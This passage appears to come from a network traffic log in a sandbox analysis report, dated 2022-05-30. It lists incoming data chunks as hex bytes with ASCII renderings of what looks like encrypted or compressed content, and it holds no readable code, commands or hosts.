Ascii: K\"d+q+MJdu\|b\|\3UnFD&mS.!el`(+:eb/~2Op@4UJ\49A:V?<2mxqQpmn#har0-!ys[@ZN5b[M["7u(m>toFwNn;YIZ3 WDA05
2022-05-30 12:45:08 UTC	333	IN	Data Raw: ba a0 15 07 eb b3 08 ab 88 61 c4 3a 75 e5 f7 fd da 47 32 fc eb 6c 8a 85 a8 0d 89 e1 2d 84 5c da 10 d5 a4 bc e1 80 ba cc c9 05 d3 ce 89 9e 94 e9 b0 e6 ec e3 a3 54 c4 8c 37 f1 72 ef 7a 0e c3 92 1c dc 2c 83 96 9d 3c 45 d2 f4 02 9f 0b c4 1a f7 93 d5 ac e8 8b 31 1a c2 f2 ac 8d 85 42 31 28 84 20 4e cd b8 d4 1a f1 35 c9 b6 e9 22 fb 8a 98 f8 1e 06 d3 a5 8f f3 e1 f4 27 7a e5 54 d0 93 eb 0f 24 fa 78 96 8c 2b 6a a4 24 ef 5e c3 81 76 35 88 30 dd 74 74 fe 92 bc fc b9 13 ea c0 5f 3d 0b 11 e3 ab 0e 84 74 95 75 64 1b 3e e4 50 05 52 03 03 8a 22 97 f4 6a 54 11 f7 3e 2f 62 0a 49 d5 a1 fb b2 77 12 e0 31 63 16 0f e3 84 94 58 83 72 ba e3 42 d1 90 6b c3 c3 c5 ad f6 f5 b6 7c ee 9c ff fc 6a d5 9d 05 ba b4 dc 97 00 88 c1 87 0d d2 bc 16 b0 52 9c 85 3d a8 0f 00 59 1d 11 dc 80 01 91 Data Ascii: a:uG2l-\T7rz,<E1B1( N5"'zT$x+j$^v50tt_=tud>PR"jT>/bIw1cXrBk\|jR=Y
2022-05-30 12:45:08 UTC	334	IN	Data Raw: b4 d2 03 9d fb c5 2e 59 ad eb f2 52 16 ba 9d c1 fc 86 3b 3a 2a 6b bf b2 f9 09 26 b9 4f 46 6b 53 d8 42 b0 ca c7 69 67 10 b6 93 ad 74 d3 43 4d 0e 66 8b 0d ff e9 aa a1 3d 72 e8 ed d3 23 58 8f cb 4d 3a 87 f0 b2 c6 4c 73 bb ce 7d 03 4f e4 39 45 43 cf 5c 82 f1 6f e6 04 09 77 8f 61 10 21 f8 a5 17 37 98 a6 91 de 8a 0d 51 3b 07 9d d8 4a 4c 5a 75 2b 68 3a d0 0a 53 42 9f 1b 44 f8 d3 4f b4 5b 31 98 54 c5 3d 99 6e cd fc 23 5b f8 c9 69 34 48 1a 72 57 d7 a1 4f 7a 8d 99 9d e9 bb b8 84 28 ce b1 10 75 50 a4 b0 6d 93 44 c8 58 af 03 99 33 bd ec b4 f3 6c 71 79 e5 e1 e1 6d ab bc 6b f8 b1 ec 9e ec 2a ff 95 f0 47 c8 e8 27 fd c2 16 ae 88 34 14 9e ce cc 99 0a ee f4 34 0e 3f 69 96 f5 08 fe e4 65 07 86 46 eb 62 ff d1 80 6a 48 b3 c7 4d 77 2f 58 ac db 64 48 c6 1c a6 2e cf 19 fa 88 ff Data Ascii: .YR;:k&OFkSBigtCMf=r#XM:Ls}O9EC\owa!7Q;JLZu+h:SBDO[1T=n#[i4HrWOz(uPmDX3lqymkG'44?ieFbjHMw/XdH.
2022-05-30 12:45:08 UTC	335	IN	Data Raw: 55 7f d2 3d 76 13 4a 60 53 a6 a7 22 fd 66 70 7c 6e a1 3e 54 0a 1b 54 67 96 6c e4 17 10 34 00 af c6 9c 47 e9 51 e1 72 56 6d 39 08 12 f1 ec 4a a1 54 b6 47 d5 31 9b 78 bf 15 4f 7f f3 d8 6e 39 90 0f fb 88 46 a3 83 1c 21 a5 f5 e4 59 bf d2 c2 5f d8 ed 80 34 eb 1d f0 ea 81 16 6b 1a d1 4d 6a 99 81 58 b0 1f c9 a9 4d 16 14 71 dd 3e ad dd 60 a5 e1 de 31 2e 33 18 78 21 c1 a6 6e c2 2e 3a 28 3c 44 37 99 2f 69 01 6d 21 de 57 d3 2c 92 20 03 53 ad 54 74 15 14 c3 1a 20 88 57 70 a6 54 60 44 dd 69 67 7c bd 0a 5d 9b 37 bf 74 ae f3 5d 9b 3c fb 61 78 30 dc 9b 27 fd 13 6d 1f c4 f9 6c d0 af b8 05 cf cb 9d 7b 99 d3 8c e3 b3 49 a2 23 98 f8 82 08 65 88 61 62 85 a9 d0 56 9f 0f 3d 28 3d 19 38 5c 11 9c 83 f0 44 61 8f 13 34 ae 52 85 cd e9 88 d8 5a 7c 99 14 49 42 9e 89 d0 fb 8a cc 67 61 Data Ascii: U=vJ`S"fp\|n>TTgl4GQrVm9JTG1xOn9F!Y_4kMjXMq>`1.3x!n.:(<D7/im!W, STt WpT`Dig\|]7t]<ax0'ml{I#eabV=(=8\Da4RZ\|IBga
2022-05-30 12:45:08 UTC	337	IN	Data Raw: 3c dc f7 c5 e8 5d b1 02 d9 20 d5 40 a9 21 54 af 4f b7 44 9d 32 4c ee 21 b4 58 ee 2f 7c a5 9b 00 f5 c9 59 9d c2 36 0f 4d f1 e4 d5 2e 07 a1 77 c9 41 06 d4 64 a4 aa 67 35 ae 2f 2a cb 54 26 de 9d 65 0d f5 99 4e 82 6d 91 eb e3 50 71 7e 7f 22 7c 91 7d c2 aa 7c a1 2e 50 85 98 14 b2 ee 87 54 1f 1a 28 2c 25 b2 5d cc ce b0 84 57 c9 ea 8a 8a 6c 86 97 18 cb 9a 5a e2 ac 4d e4 7d 91 3b ef d9 b3 05 39 31 ed c3 9f 54 ca 7b 73 64 71 fb 7f 6b d5 fc eb 7a 3a c9 07 e5 28 20 57 04 28 ba 98 ff 28 2c 8c 87 a9 6b 14 02 0d a2 33 ba 0a cd 01 c9 83 40 dc 4e 8a d5 b9 2b a3 55 01 ae 9b e9 6d 4a ca 5d 92 f9 5b c5 74 f7 d6 d6 b8 07 10 c3 76 f5 56 52 5b fe b3 d7 ea d6 de 66 88 ed 80 87 5e 0d e1 5f ec cb 73 d2 cc 04 08 82 61 34 c0 9b 4e 4e 3b 2c 63 ad 6b e5 09 b4 76 8c 4c f1 1d c1 8b 95 Data Ascii: <] @!TOD2L!X/\|Y6M.wAdg5/*T&eNmPq~"\|}\|.PT(,%]WlZM};91T{sdqkz:( W((,k3@N+UmJ][tvVR[f^_sa4NN;,ckvL
2022-05-30 12:45:08 UTC	337	IN	Data Raw: cd c6 3f 68 9b a3 30 fa 18 2c 77 c7 cb a5 a8 10 d9 65 d0 bd 71 a9 dd e1 7f 80 a1 52 23 3c c7 c0 b8 4f 9c f7 8c 0b be 4b fd 60 88 00 7a 0f ce 5e 1f 13 4e fd ad 41 0c ee f4 23 bb 14 e0 63 63 4e 66 53 26 7e 6c 9e cf b6 ef 84 a4 d5 ab 00 43 8d 36 f8 de 01 12 3b 45 85 92 cb d6 93 b5 1d 66 de 18 22 ee 0f 18 68 74 b8 59 74 0c 9e 34 1b 86 9b c6 d8 3d c2 87 16 43 d4 7b a3 a6 c2 16 71 68 ee 08 7f d1 95 7d c4 1d cc 33 a0 67 ad 10 a3 8c 22 a3 d9 28 70 59 7c 5c 0b 3a f9 19 82 4a 73 3f 9f dd 4c 87 25 92 9c 20 d4 85 9d 75 8d 63 bf 83 94 ae 34 3a 3c ea 80 b5 01 0c 7f e8 9c 11 5c 9e 16 af 69 70 78 04 fa ca 44 29 ea 5a 5f c8 93 be 79 1e a7 da a7 52 60 44 d4 6a bc df e8 1f a1 17 5e a3 03 2d 31 23 22 72 1e 2d 92 44 f8 15 82 a8 b3 86 1a 35 ea aa 89 55 7e f5 81 8e 04 dc 31 a3 Data Ascii: ?h0,weqR#<OK`z^NA#ccNfS&~lC6;Ef"htYt4=C{qh}3g"(pY\|\:Js?L% uc4:<\ipxD)Z_yR`Dj^-1#"r-D5U~1
2022-05-30 12:45:08 UTC	339	IN	Data Raw: 9c 2e 5f ea b1 04 ad cd d6 a2 83 43 bb d6 ea 47 91 27 fa fd fa d6 b9 ac 4c d7 68 98 f2 df 0a b1 d3 d4 be 31 bb 89 22 4d 76 0e 85 a0 09 5d 89 9b 86 ad 39 2b 14 8c 41 b7 97 38 df 75 14 3b a4 ef db 60 57 06 8a 84 15 1f 1f 14 8c 6e 58 51 b5 5e 73 b1 9c 2e b8 cb 9f 3f f7 ea 44 b8 eb 41 36 bc 58 32 cc 12 ac fe 2e 6c 22 b6 22 3a d4 90 f4 3e 01 c3 44 1b 3b 9d 7e d9 fe b7 5b 6f d7 17 04 fa c8 88 c3 6b 18 67 b3 39 9a 09 9d 89 7e c4 11 2a ed 2d 26 15 5a f7 86 22 96 f7 15 d9 d8 ec f9 b6 0c b7 fc 86 1c 8f c9 66 99 9a 2d e4 f4 76 24 d3 ad b9 9b 4f 8c d2 2c 6b a4 d6 22 7e 8b 24 e4 3a 0b 25 3d 8e ef 5f 71 0f c9 ea 1b 62 f5 d2 8c fa 36 76 47 ac eb 5a ce 60 07 02 3a 7f 63 18 11 64 7b e0 3c 25 fd 82 08 8c 79 b4 b7 61 9f d0 f3 04 ea 86 48 8b c3 d6 8e 02 08 a8 6f c3 b4 dc f3 Data Ascii: ._CG'Lh1"Mv]9+A8u;`WnXQ^s.?DA6X2.l"":>D;~[okg9~*-&Z"f-v$O,k"~$:%=_qb6vGZ`:cd{<%yaHo
2022-05-30 12:45:08 UTC	340	IN	Data Raw: 0a da a5 54 6e 17 79 c0 63 44 97 45 2a d3 63 b7 3a 0c 5c f7 58 d1 92 e7 5f 80 ad 2d 89 45 7d 8f ed a2 60 e5 61 13 32 f7 cb 19 1f b1 3f d9 be 84 ec a3 c4 7e 94 b9 8e 35 06 e8 de 5d 3d d4 89 71 c5 0b a5 a2 40 f2 0a 56 b9 34 cd d1 fb 77 99 73 b5 42 31 37 78 93 c4 dc c7 11 48 35 b1 8d 51 57 9f 8c 3e 02 42 3b 51 50 aa b6 1e 2a 6d 5e 1b 57 5b 92 ba dc 35 2e 0a 50 16 33 b5 06 39 d7 e0 74 1f 1a d6 54 e1 25 52 7d c7 b1 e6 9c 5d 47 dd 1e 4c 77 35 35 97 d8 c8 16 bf 36 f3 d3 c3 2c 9a cc b6 27 d7 93 b9 53 16 d5 35 3d a0 9b 96 91 c8 92 19 0c 79 c9 ba ab a5 63 1d 57 bf 9e 5f 51 4b ad 9f ac e1 eb 16 90 1c 4a 08 30 2a dc 87 12 a7 2f 08 99 fc 69 36 f1 e6 96 99 95 52 78 4e 29 c6 a8 9d 34 35 04 b4 e5 4a 06 b6 db 4a 4e 66 99 c9 75 80 cd f2 b6 b7 2c ee e2 c7 26 af 4a 9a 9b fb Data Ascii: TnycDEc:\X_-E}`a2?~5]=q@V4wsB17xH5QW>B;QPm^W[5.P39tT%R}]GLw556,'S5=ycW_QKJ0*/i6RxN)45JJNfu,&J
2022-05-30 12:45:08 UTC	341	IN	Data Raw: 46 31 7d c9 a5 e9 22 a2 81 8e e3 45 8f 36 f8 de 65 6b e1 43 86 d0 54 d0 13 a2 c7 60 ca 74 bd e8 9f 2f b2 72 38 d7 eb 0a 3e dd c1 80 e6 74 47 3b 72 0a cc 45 aa af 3c a0 02 bd ab 6e e2 fa e0 d7 45 3c 21 1b 4d 27 00 61 49 7f 46 8a 4b 97 79 2e 84 54 99 5a 7b 6e 59 1f 8a 62 96 39 9e b3 ec 81 05 5c 79 26 56 1d 3d 73 b5 85 5a 85 18 6c 94 3c 6c 70 65 b3 84 d2 df ee f4 b5 b9 98 1b 51 c9 76 0c 5a 1e cc c2 0d 4b 5c d7 ba 77 b8 fe 54 06 dc 3f 46 84 42 ca 1a 1d d9 58 d1 45 11 7a 31 a2 2b f9 c9 c6 74 15 87 33 42 10 e3 66 ae 91 56 bb 33 e2 03 6d 53 01 07 20 88 18 95 d6 a5 7b 58 6f 36 b9 38 7e 98 9b f3 7d d8 10 52 98 4e 2d 12 c9 99 06 99 d8 d0 e5 76 65 1c 75 ac 7b 32 1d 34 9e 10 3a 41 ae 40 dd 52 0f 80 98 a3 20 b9 b8 38 4e 72 af f9 49 36 13 45 5a a1 c8 88 10 6f bb 9b 78 Data Ascii: F1}"E6ekCT`t/r8>tG;rE<nE<!M'aIFKy.TZ{nYb9\y&V=sZl<lpeQvZK\wT?FBXEz1+t3BfV3mS {Xo68~}RN-veu{24:A@R 8NrI6EZox
2022-05-30 12:45:08 UTC	342	IN	Data Raw: 68 fe d4 67 70 7c 71 ff 1d 37 23 fb 2b 1e d3 f9 5c 47 c9 db 7c 26 ae 60 cc 20 83 0c d1 3a 5d a0 7b cf b2 47 02 49 e1 22 7d da e4 d2 4b 01 b1 4f 75 2a cd 73 ba a6 d6 0e 0a b0 73 60 bd c1 fc fb 02 7b 0c f0 56 a6 09 80 cb 23 a5 7d 04 f2 3c 23 13 58 f6 a6 38 99 f7 09 e2 d8 ea f9 b8 00 99 e0 ce 2e 8d c8 6f 8c 9c 3a 8a 90 1f 50 e9 a7 a3 8b 47 92 de 04 67 ae dc 13 40 ea 50 8d 55 32 06 2f a3 cf 5d 79 20 c3 84 7f 4c e4 cf b0 ed 13 63 50 a8 de 51 cf 60 57 70 5f 1c 46 17 32 25 04 ab 16 49 0c aa 27 e1 a8 0c f7 36 58 03 d6 47 59 94 6a e2 05 ae a2 6c f8 71 5d aa b7 df fb 6a db e1 ab 6f c9 3b 93 f3 a0 ac 61 93 ff a4 7e fa f4 24 9e 0b 88 00 06 e8 ab 2f 3c dc 3a 98 b6 b5 5d a2 a7 e6 d6 51 a8 a6 09 3b 35 9c 56 1b 78 6c bb cf a8 41 d3 a0 ae d4 20 de 64 af 92 6e 41 cf 06 fd Data Ascii: hgp\|q7#+\G\|&` :]{GI"}KOu*ss`{V#}<#X8.o:PGg@PU2/]y LcPQ`Wp_F2%I'6XGYjlq]jo;a~$/<:]Q;5VxlA dnA
2022-05-30 12:45:08 UTC	344	IN	Data Raw: a7 08 d3 6f 2f d9 58 a2 de f8 12 ee 05 c4 2e 55 6f 7f b5 a7 b3 b1 11 48 b1 ab ad 22 23 ee fe 5d f7 0a 0b 3f 2d d8 d7 77 da 64 79 77 2f 7f e6 c8 0d 7d 0a 6d 2f 7b 5d b5 b2 23 f7 93 1e 77 6e f6 fb fc 14 72 32 a5 91 94 31 5b 65 b8 3f 3b 03 54 99 9a bd a6 5b cf 16 81 52 c8 06 ec 8a c0 46 b5 0f b4 16 16 f1 42 49 d2 02 9f b9 e8 c3 74 61 1c ae a6 9a a5 45 6d 32 c7 fe 16 72 22 e6 fe 8c 83 be 0c ac 1c 63 78 59 47 95 8a 77 c8 70 78 99 fc 51 2b db 89 9d f0 f4 3c 45 07 0a af e8 fc 47 15 3b ad c5 24 0b db b5 6a 55 76 af bd 3f e9 cd f2 c2 aa 06 81 f0 ae 47 c1 b3 d3 b8 92 f6 fd ac c9 4f 41 dd f2 ea 0e b1 d3 4c d7 74 94 b2 65 4d a5 a7 af e5 1d 62 ce 9b 78 3e 13 6e c2 24 06 b7 f2 ce f2 30 dc 88 e4 ef 6f b4 7b 43 8a be 11 1f 1f c0 e5 2b 58 6a b1 5e 73 51 f5 6b 47 f7 df 3f Data Ascii: o/X.UoH"#]?-wdyw/}m/{]#wnr21[e?;T[RFBItaEm2r"cxYGwpxQ+<EG;$jUv?GOALteMbx>n$0o{C+Xj^sQkG?
2022-05-30 12:45:08 UTC	345	IN	Data Raw: 70 cc 27 00 09 cb 73 03 ab 22 97 79 ba 00 58 dc 39 0b 6e 59 7f e7 6d d3 38 9f b3 ec 21 55 53 3c 62 d4 1d 3d df fd 8a 1f f8 94 6c 94 84 4c 7f 20 04 01 d2 df 86 f9 ba fc 9a 16 51 c9 a6 08 55 5b 89 44 0d 4b dc 3a b5 32 bc 79 54 06 00 d7 49 c1 05 d4 1a 1d 31 98 de 00 96 5e 31 a2 a3 54 c6 83 71 1e 87 33 b6 88 ec 23 e6 b3 56 bb a3 8f 0d 28 55 7e 07 20 88 75 9b 93 07 f2 58 6f 3a fc 36 3b 09 10 f3 7d c0 25 5c dd 07 a7 12 c9 bd 23 97 9d 63 f2 76 65 2c 64 a2 3e 99 05 34 9e 78 dd 4f eb 01 c2 52 0f bc 7d ad 65 32 ca 38 4e ea 6e f7 0c 31 97 45 5a ed 7d 86 55 25 33 9b 78 1f 98 d6 7f fb d8 5d f9 72 7e be 88 65 60 e5 13 12 22 d6 eb bb 71 dd 46 89 a9 a8 80 6a e4 0d ed b6 8b 15 6b 21 de 5d 4f 39 8b 5b b0 eb c6 c7 60 02 1e 72 dd e2 a2 b2 90 f7 9f 59 c0 eb 55 17 17 5c d6 ec Data Ascii: p's"yX9nYm8!US<b=lL QU[DK:2yTI1^1Tq3#V(U~ uXo:6;}%\#cve,d>4xOR}e28Nn1EZ}U%3x]r~e`"qFjk!]O9[`rYU\
2022-05-30 12:45:08 UTC	346	IN	Data Raw: a9 39 d3 67 ec 8b 52 a5 21 43 97 48 f5 15 71 93 0c 56 ff 98 5f f9 fc 9e 52 d7 6e db a5 f0 0a e3 11 03 e9 d9 16 fc d5 1f f6 ba c2 d7 a1 58 bb bb d4 09 c8 b3 59 4b ce 24 ff 3a 5c 44 d2 9d eb 33 87 4c a6 84 ef 7d c4 bb be 94 60 17 cd a3 cf 38 91 05 07 02 a6 09 6a 64 2d 64 77 ed 1f 42 2c fe 0e 8c cd 0c 5f 17 7c 68 39 04 36 fa 2e ec 34 c7 f5 02 ae 10 97 b5 93 bd 17 0f db e1 83 41 e2 52 de 9a c1 c0 cc 9f df f7 ad ad b8 4b bd 06 cd 00 1a a9 c8 5e 99 c3 0d fd bb e7 0a ee 14 f3 f8 14 be c5 65 4e 0e 93 65 7e 65 38 c9 b6 01 54 e7 d5 98 a6 45 8d 3e 9f 9b 01 17 a4 43 85 24 22 95 93 97 82 60 de 14 db ad 0f 46 f7 72 b8 d7 9c 4f 9e f6 84 80 9b 24 21 7e c2 5d 89 45 d4 a3 4b e5 c2 94 ee 6e ee fa 87 92 95 41 64 1b cc 3f 77 24 ad a8 03 8a 22 a7 0e 6b 70 66 dc 5a 0b f6 3f 5a Data Ascii: 9gR!CHqV_RnXYK$:\D3L}`8jd-dwB,_\|h96.4ARK^eNe~e8TE>C$"`FrO$!~]EKnAd?w$"kpfZ?Z
2022-05-30 12:45:08 UTC	348	IN	Data Raw: 24 12 a1 91 f8 fd 47 20 95 1e 73 03 00 41 f2 f8 c0 79 aa 16 ac b6 e9 43 be a9 c4 46 c3 ff b5 53 3b d5 10 49 9c fe f7 fc 80 e6 09 61 31 a6 8e df e8 63 69 32 a6 ea 05 37 0f c1 bb 8c d9 9e 48 e9 50 4a 1d 59 33 b9 8d 32 c8 5a 7c 99 99 69 37 9e a4 b6 b1 f4 6f 01 6e 4f c2 c4 93 47 38 6b 89 80 6f 26 df b5 1e 3d 71 ea 90 10 b7 cd b3 b6 c3 43 f9 c2 c2 47 ec 33 e0 fd d3 c2 f9 ac b3 c3 5d 98 df df 50 b1 92 d4 be 31 f5 84 07 4d 88 03 9c a0 5c 55 ca 9b 13 8e 1b 2b ef 1c 45 b7 b7 72 9b 75 ba b1 8f ef 42 7c 54 06 c5 84 15 1f 77 14 e5 6e 75 51 fc 5e 3d b1 9c 2e 2a c9 af 3f 79 cb 4c b8 11 d0 75 bc 2b 32 a9 12 81 fe 60 6c 6d b6 22 3a d2 90 e2 3e 5e c3 67 1b 07 9d 12 d9 a6 b7 02 6f d4 17 2b fa fe 88 af 6b 73 67 ca 39 fe 67 bf fd 50 a5 7d 43 e4 48 12 7a 19 93 a4 56 ba 98 7b Data Ascii: $G sAyCFS;Ia1ci27HPJY32Z\|i7onOG8ko&=qCG3]P1M\U+EruB\|TwnuQ^=.*?yLu+2`lm":>^go+ksg9gP}CHzV{
2022-05-30 12:45:08 UTC	349	IN	Data Raw: 38 5c 32 f0 41 b8 54 54 40 dc ee 0c c1 42 d4 1a 7c d9 9a 9b 2d 11 07 31 e7 2b 31 83 e6 74 70 87 1e 42 bb a9 61 ae b3 56 de 33 99 48 05 53 3d 07 6f 88 04 de e0 a5 9f 58 01 36 a0 73 7d 98 59 f3 7d d8 54 19 bc 4e d5 12 e4 99 01 d2 c4 d0 f2 76 00 1c 7b e7 13 32 47 34 c4 10 ba 0a 8e 40 b1 52 22 80 5c e8 20 b9 ca 38 2f 72 79 b2 21 36 dd 45 15 a1 0c c3 30 6f 5d 9b 55 bf a9 93 2b f3 d8 5d 9c 2a 7c fb a5 c6 21 e5 41 76 53 93 8a 76 03 dd 6b f9 94 ed c2 c6 e4 0d 88 ca 94 50 46 e8 84 5d 18 b1 fa 1e d5 79 b5 c7 4d 96 2a 37 9e 58 a2 b2 f1 57 9c 1c ed 2e 1e 17 40 f0 a7 a9 d0 11 26 35 ee e8 72 38 a2 fe 5d 67 07 4e 4c 31 f1 d7 34 46 40 3c 77 32 1a e6 ba a5 38 4f 2c 31 3a 5d b5 06 2e b2 e0 01 5e 6e a3 3b cd 51 72 12 c0 91 e6 fd 1e 20 fa 1e 77 03 54 41 97 f8 d5 79 e6 16 d1 Data Ascii: 8\2ATT@B\|-1+1tpBaV3HS=oX6s}Y}TNv{2G4@R"\ 8/ry!6E0o]U+]\|!AvSvkPF]yM7XW.@&5r8]gNL14F@<w28O,1:].^n;Qr wTAy
2022-05-30 12:45:08 UTC	350	IN	Data Raw: f1 7f 0b 81 dd e3 e6 60 3a 35 a8 8a 5b a2 05 07 65 3a 13 2f 49 57 01 77 9e 7f 25 69 99 4e f9 cd 21 f7 08 39 06 b3 04 36 92 0e ee 71 ea cd 6b ae 7c 2f c3 d6 d5 97 66 db cc ab 4f a7 3c e7 9a c1 a8 08 9b 9a da 2c cf b8 2a fd 60 88 68 06 db c8 73 49 dd 48 8f e5 e7 0a 86 c8 f0 bd 39 d0 ad 65 3b 46 f5 20 16 78 41 c9 9b e9 43 a2 b8 c7 a6 45 e4 36 9c de 2c 22 cd 43 e1 d0 54 d0 fa eb f1 60 f3 74 d4 e8 7c 66 f7 72 d1 d7 9f 0a b3 94 e7 80 f3 74 47 3b ab 43 fd 45 f9 af 55 a0 b6 f4 ee 6e 84 fa 81 d7 b8 75 0e 1b bc 27 00 61 c6 36 62 8a 0f 97 1e 2e 15 1d dc 5a 60 6e 32 1f af 28 b8 39 e5 b3 ec 81 4e 16 52 26 f9 1d 54 73 e3 cf 1f 85 ff 6c fb 3c 11 3a 4b b3 73 d2 df ee f7 ff 93 98 7d 51 e4 76 11 10 35 cc 44 0d 4b 5c 34 f0 4b b8 54 54 6d dc c0 0c c1 42 b8 1a 69 d9 c5 9b 6c Data Ascii: `:5[e:/IWw%iN!96qk\|/fO<,*`hsIH9e;F xACE6,"CT`t\|frtG;CEUnu'a6b.Z`n2(9NR&Tsl<:Ks}Qv5DK\4KTTmBil
2022-05-30 12:45:08 UTC	351	IN	Data Raw: 35 47 88 e3 1f c8 68 7c b4 fc 59 42 9e 89 b6 f4 9f 3c 64 6e 3d af aa f8 22 15 07 c4 b3 24 14 df b5 6a 3d 1f eb bd 10 ed ce f2 b6 c3 42 81 c2 aa 44 c1 33 ba fc 92 c2 f9 af c9 c3 28 99 f2 df 0a b2 d3 d4 be 33 94 84 61 4e a5 03 c6 c3 6e 38 2a 9a 78 8e 7a 2b c2 1c 02 b7 f2 72 9b 76 dc b1 e0 cf 6a ef 0b 06 8a 84 15 1f 1f 14 8c 28 03 12 b5 ce f2 f7 9c 9c 56 8a db 99 ec 8b 01 da 24 b4 55 d9 20 51 a9 62 d8 97 41 02 22 b6 22 ba c5 d5 91 b2 09 86 2a 8f 24 d8 12 79 b7 f2 69 c3 83 52 60 42 de cd af af 62 22 b3 ed a9 22 f4 1d 6d e0 7d ab ed 0d 65 8a 4e d6 ef aa 85 dd 7b 87 c2 db 90 b3 7e 9d 99 92 34 a6 ac 1f 92 9c 42 ae eb 5a 50 92 b9 92 cd 02 85 fe 4d 29 d8 f5 61 1d f0 61 e4 0e 27 01 56 d3 d5 76 1d 70 dd c1 7f 43 fa fe e3 40 75 51 35 89 f1 7d a2 55 7c 47 3a 0f 79 21 Data Ascii: 5Gh\|YB<dn="$j=BD3(3aNn8xz+rvj(V$U QbA""$yiR`Bb""m}eN{~4BZPM)aa'VvpC@uQ5}U\|G:y!
2022-05-30 12:45:08 UTC	353	IN	Data Raw: 76 ae 3b d5 77 ee 99 52 b2 e8 b4 86 56 17 79 61 92 4c 5c 6c 5a f9 37 ba 6a ae 08 c2 32 5d d4 58 a1 65 b9 ca 58 22 1d 68 d3 60 16 e1 23 2e c0 6e af 30 48 33 fb 14 d0 9e f2 13 d3 ae 3b 8d 4b 6d 97 ed e6 03 8a 7d 05 27 e1 9e 15 05 b2 34 d9 bb 81 ef b5 91 7f 88 ed fa 70 05 8d a9 06 12 b1 fa 3e d4 1c aa a2 14 f3 34 6a dd 58 a2 d2 ff 3a 80 75 e0 4d 34 7b 7b 83 ce ce 92 11 48 55 b3 84 43 5b 8f 93 38 09 16 6e 5b 54 b0 b2 03 23 2c 5f 1b 5d 08 93 ba c0 32 4f 6d 51 0f 31 d4 65 2e df f6 6f 07 4e 92 5e f8 34 06 77 fa cc b4 9e 5f 4f cb 6b 4d 66 73 41 f2 f8 a6 19 a6 77 ef d7 c7 26 88 89 b2 23 d6 8b b3 21 36 b6 29 27 a1 8a 85 89 8b 92 1f 13 3c cf bb ba d7 02 1d 5d b5 cd 7f 37 22 a1 97 ed ed ff 02 8c 78 6a 0a 3c 24 cd 8c 40 e8 3e 19 ea 88 1b 37 fd fd d9 86 d4 55 75 0b 3d Data Ascii: v;wRVyaL\lZ7j2]XeX"h`#.n0H3;Km}'4p>4jX:uM4{{HUC[8n[T#,_]2OmQ1e.oN^4w_OkMfsAw&#!6)'<]7"xj<$@>7Uu=
2022-05-30 12:45:08 UTC	353	IN	Data Raw: e0 a9 23 ae b6 56 bb 33 e7 48 28 53 78 07 20 88 0d de 93 a5 f5 58 6f 36 81 73 3b 98 18 f3 7d d8 58 19 dd 4e ae 12 c9 99 5e d2 9d d0 f8 76 65 1c 12 e7 3e 32 0e 34 9e 10 b2 0a eb 40 ce 52 0f 80 1a e8 65 b9 c7 38 4e 72 1d b2 0c 36 98 45 5a a1 0e c3 55 6f 23 9b 78 bf f0 93 7f f3 c9 5d f9 2a 1d fb 88 c6 72 e5 13 76 51 93 eb 76 50 dd 46 f9 d5 ed 80 c6 d1 0d ed ca f8 50 6b e8 9f 5d 4f b1 f7 1e b0 79 85 c7 60 96 6d 37 dd 58 f2 b2 90 57 ff 1c c0 2e 07 17 17 f0 aa a9 b5 11 1b 35 c3 e8 2f 38 ea fe 0a 67 62 4e 29 31 dc d7 2e 46 0c 3c 7c 32 7b e6 a4 a5 15 4f 60 31 7f 5d d8 06 4b b2 b3 01 73 6e 86 3b 94 51 6e 12 a1 91 e6 fd 33 20 b1 1e 3f 03 52 41 f2 f8 b0 79 cb 16 01 b6 a0 43 e6 a9 c4 46 34 ff dc 53 1c d5 46 49 50 fe f7 fc e1 e6 70 61 9f a6 cf df b3 63 69 32 43 ea 7f Data Ascii: #V3H(Sx Xo6s;}XN^ve>24@Re8Nr6EZUo#x]*rvQvPFPk]Oy`m7XW.5/8gbN)1.F<\|2{O`1]Ksn;Qn3 ?RAyCF4SFIPpaci2C
2022-05-30 12:45:08 UTC	355	IN	Data Raw: 41 39 48 b3 24 36 da 0e ab 71 e7 cd 22 ae 30 2f e3 d6 9d 97 2f db a9 ab 36 a7 42 e7 8a c1 d0 08 f9 9a e7 2c bd b8 5b fd 70 88 10 06 b9 c8 4e 49 a5 48 ed e5 f7 0a 6a c8 01 bd 90 d0 41 65 ca 46 71 20 fa 78 bc c9 32 e9 a6 a2 c5 c7 b6 45 9d 36 e8 de 11 22 b4 43 95 d0 d5 d1 12 ea 03 61 5f 75 3c e9 8e 67 f6 73 b9 d6 ea 0b 9f 95 85 81 9a 75 46 3a c3 42 88 44 d5 ae 3d a1 c3 f5 ef 6f ef fb e1 d6 94 74 65 1a cd 26 01 60 ac 37 13 8a 32 97 69 2e 60 1d cc 5a 1b 6e db 1e 00 29 51 38 1d b2 6e 80 a7 17 3e 27 d6 1c 3f 72 8f ce 1d 84 96 6d 96 3d 3e 3b 22 b2 03 d3 dd ef 9e fe fe 99 14 50 cb 77 7a 11 59 cd 46 0c 49 5d 5d f1 22 b8 69 54 16 dc b7 0c e1 42 f4 1a 3d d9 c8 9b 20 11 7e 31 8a 2b 11 83 a3 74 3e 87 13 42 d8 a9 03 ae 93 56 9b 33 ca 48 08 53 5e 07 00 88 24 de b3 a5 d2 Data Ascii: A9H$6q"0//6B,[pNIHjAeFq x2E6"Ca_u<gsuF:BD=ote&`72i.`Zn)Q8n>'?rm=>;"PwzYFI]]"iTB= ~1+t>BV3HS^$
2022-05-30 12:45:08 UTC	356	IN	Data Raw: 81 a2 54 02 d0 2c 0f 31 72 06 85 46 0a 63 8d 0a ff 77 33 5d 12 28 7e 1a 17 fd 4e 25 07 d3 6b 08 08 63 ef 4b 64 80 af 46 e7 23 46 fa bd 23 71 93 62 97 c5 2d ec f3 45 01 86 6e 83 2b 49 19 15 94 80 ef f8 75 84 14 1d 1c 10 89 68 5f 59 bc 54 78 bd 91 20 48 d9 ca 2d 47 df 14 ae 52 c8 6c a6 43 2e d1 0c b3 de 0f 4e 01 92 07 1c 98 b8 b8 14 58 ef 07 35 71 ad 23 eb fe 83 5c 59 ce 2f 59 c0 9f b4 92 55 27 27 d2 5b b0 03 91 9b 70 cd 14 29 fc 24 08 14 5b e3 9e 24 8c ec 0e f9 ce e6 e9 ad 35 87 c4 d8 10 83 cd 61 8a bd 27 ec f7 77 39 d0 a9 bb a0 40 91 cb 3c 7b bb c7 14 5b fc 5c 9d 40 27 38 2b 95 d1 b3 9c ce 25 00 fa 8d 06 33 6a 1e eb 9b b8 4b 05 a8 33 97 94 96 af e9 b8 fc ce fe ec 71 e2 bb f6 5e ef 2e 